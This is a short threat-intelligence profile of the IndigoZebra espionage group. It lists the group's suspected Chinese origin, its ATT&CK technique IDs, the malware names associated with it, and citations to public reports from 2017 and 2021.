Introduction
IndigoZebra is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014. HackerNews IndigoZebra July 2021 Checkpoint IndigoZebra July 2021 Securelist APT Trends Q2 2017
Activities and Tactics
Country of Origin: π¨π³ China
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1583.001 Domains
- T1588.002 Tool
- T1583.006 Web Services
- T1586.002 Email Accounts
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
ATT&CK technique IDs (denormalized)
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- Backdoor.Oldrea
- PoisonIvy
- Unknown Logger
MITRE ATT&CK Software
Attribution and Evidence
Country of Origin: China Additional attribution information pending cataloguing.
References
[1] mitre-attack [3] HackerNews IndigoZebra July 2021 Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021. [4] Checkpoint IndigoZebra July 2021 CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021. [5] Securelist APT Trends Q2 2017 Kaspersky Labβs Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.